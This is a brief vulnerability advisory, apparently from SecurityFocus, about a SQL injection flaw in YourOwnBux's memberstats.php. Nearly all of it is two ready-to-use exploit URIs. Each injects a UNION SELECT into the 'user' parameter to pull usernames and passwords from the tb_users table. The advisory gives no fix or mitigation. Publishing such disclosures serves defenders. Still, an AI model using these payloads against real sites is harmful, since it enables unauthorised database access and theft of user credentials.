YourOwnBux 'memberstats.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

http://www.example.com/[installdir]/memberstats.php?user='+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password),10,11,12,13,14,15,16,17,18+from+tb_users/*

http://localhost/[installdir]/memberstats.php?user='+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password),10,11,12,13,14,15,16,17,18,19+from+tb_users/*


 

Privacy Statement
Copyright 2010, SecurityFocus